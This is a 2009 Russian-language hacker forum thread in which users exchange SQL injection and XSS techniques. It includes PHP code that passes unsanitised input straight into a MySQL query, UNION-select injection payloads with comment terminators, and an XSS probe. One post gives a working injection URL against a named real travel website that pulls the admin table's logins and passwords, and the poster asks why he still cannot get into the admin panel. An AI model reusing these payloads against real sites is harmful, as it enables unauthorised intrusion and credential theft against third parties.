
26.10.2009, 13:07
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами:
9362947
Репутация:
1196
|
|
"SELECT page_id,page_title FROM page WHERE page_id='{INJ} '";
сегодня тестил , у меня немного другой запрос ,но это сути не меняет:
Код:
$id=stripslashes($_GET['newsid']);
$news = mysql_query("select * from `news` where id ='$id'")
or die(mysql_error());
(в таблице `news` - 6 полей), думаю тут все понятно,+вклеил mysql_error(); послушать что мускул глаголит.
при манипулировании с разными вариантами запроса ,подошел :
Код:
?newsid=-1'+union+select+1,2,3,4,5,6/*
с комментарием /* , другие :
#,--, - не катят,голову сломал ,но хз почему (пробавал однострочный запрос , результат - тот же)
то есть так как описал jokester:
-1' union select 1,2/*
либо
-1' union select 1,2,3,4,5,6,7/*
|
|
|

25.10.2009, 23:11
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами:
9116877
Репутация:
468
|
|
введ в поле "><script>alert(1)</script>
а в ответ
Сведения об исключении: System.Web.HttpRequestValidationException: Обнаружено потенциально опасное значение Request.Form, полученное от клиента (ctl00$ContentPlaceHolderMain$surnameTextBox=""><s cript>alert(1)</sc...").
Ошибка источника:
[Отсутствуют соответствующие исходные строки]
Исходный файл: c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temp orary ASP.NET Files\root\a09a8f10\84ab695f\App_Web_newstudent.as px.cdcab7d2.t8jq514u.0.cs Строка: 0
Трассировка стека:
[HttpRequestValidationException (0x80004005): Обнаружено потенциально опасное значение Request.Form, полученное от клиента (ctl00$ContentPlaceHolderMain$surnameTextBox=""><s cript>alert(1)</sc...").]
System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName) +8721914
System.Web.HttpRequest.ValidateNameValueCollection (NameValueCollection nvc, String collectionName) +111
System.Web.HttpRequest.get_Form() +129
System.Web.HttpRequest.get_HasForm() +8722023
System.Web.UI.Page.GetCollectionBasedOnMethod(Bool ean dontReturnNull) +97
System.Web.UI.Page.DeterminePostBackMode() +63
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +6785
System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +242
System.Web.UI.Page.ProcessRequest() +80
System.Web.UI.Page.ProcessRequestWithNoAssert(Http Context context) +21
System.Web.UI.Page.ProcessRequest(HttpContext context) +49
ASP.newstudent_aspx.ProcessRequest(HttpContext context) in c:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temp orary ASP.NET Files\root\a09a8f10\84ab695f\App_Web_newstudent.as px.cdcab7d2.t8jq514u.0.cs:0
System.Web.CallHandlerExecutionStep.System.Web.Htt pApplication.IExecutionStep.Execute() +181
System.Web.HttpApplication.ExecuteStep(IExecutionS tep step, Boolean& completedSynchronously) +75
Информация о версии: Платформа Microsoft .NET Framework, версия:2.0.50727.3603; ASP.NET, версия:2.0.50727.3082
че за?????
|
|
|

25.10.2009, 23:13
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Krist_ALL
введ в поле "><script>alert(1)</script>
а в ответ
че за?????
Троль?
Сведения об исключении: System.Web.HttpRequestValidationException: Обнаружено потенциально опасное значение Request.Form, полученное от клиента (ctl00$ContentPlaceHolderMain$surnameTextBox=""><s cript>alert(1)</sc...").
Я в ужасе.
|
|
|

25.10.2009, 23:19
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами:
9116877
Репутация:
468
|
|
я не пойму нафиг что ругается на ошибку. причем тут фрамеворк
|
|
|

25.10.2009, 23:32
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
С нами:
9231812
Репутация:
40
|
|
Krist_ALL, это похоже на ColdFusion
|
|
|

26.10.2009, 00:47
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами:
9362947
Репутация:
1196
|
|
Код:
возможно ли провести инъекцию в этом случае:
"SELECT page_id,page_title FROM page WHERE page_id='{INJ}' ";
"SELECT column1,column2,column3,column4,column5,column6,co lumn7 FROM table_xz WHERE page_id='{INJ}' ORDER BY date desc, id desc ";
Сообщение от Ctacok
А почему же нет?
Сообщение от eliteload
тогда такой вопрос.. какой запрос надо сделать, чтобы удачно провести инъекцию?
update :
сперва глянул на локалхосте :
1) ?page_id=1+and+1=1
2) ?page_id=1+and+1=2 (ответ тот же что и в первом)
вот по этому так и решил.
Последний раз редактировалось L I G A; 26.10.2009 в 12:22..
|
|
|

26.10.2009, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
если нет никаких "особых условий", то иньекция будет обычная, тоесть с нормальным выводом. Всё зависит от скрипта
|
|
|

26.10.2009, 01:30
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
С нами:
9107354
Репутация:
122
|
|
Смотрите, есть табла админа с паролькой
Код:
http://www.ayda.ru/hotels/show_country.php?id=-11%20union%20select%201,2,3,login,5,psw,7,8,9,10,11,12,13,14,15,16,17%20FROM%20mkj_admin
есть админка http://www.ayda.ru/z_admin
Вопрос, почему я не могу попасть в админку?
блин, и так везде
|
|
|

26.10.2009, 01:33
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от TELO
Смотрите, есть табла админа с паролькой
Код:
http://www.ayda.ru/hotels/show_country.php?id=-11%20union%20select%201,2,3,login,5,psw,7,8,9,10,11,12,13,14,15,16,17%20FROM%20mkj_admin
есть админка http://www.ayda.ru/z_admin
Вопрос, почему я не могу попасть в админку?
блин, и так везде
Потому что у тебя на z_admin стоит бейсик авторизация.
|
|
|

26.10.2009, 01:33
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
eliteload
-1 union select 1,2/*
либо
-1 union select 1,2,3,4,5,6,7/*
Вывод не зависит запроса к базе. Вывод это скрипт, т.к. скрипта не вижу, не знаю где будет вывод.
Опять-же повторюсь. это если в скрипте нет никаких заморочек типо die() при нулевом результате выборки и т.д.
ну и я не понял, ты там ' ' для обрамления поставил, или они в коде есть, если в коде то
-1' union select 1,2/*
либо
-1' union select 1,2,3,4,5,6,7/*
Последний раз редактировалось jokester; 26.10.2009 в 01:38..
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 10 (пользователей: 0 , гостей: 10)
|
|
|
|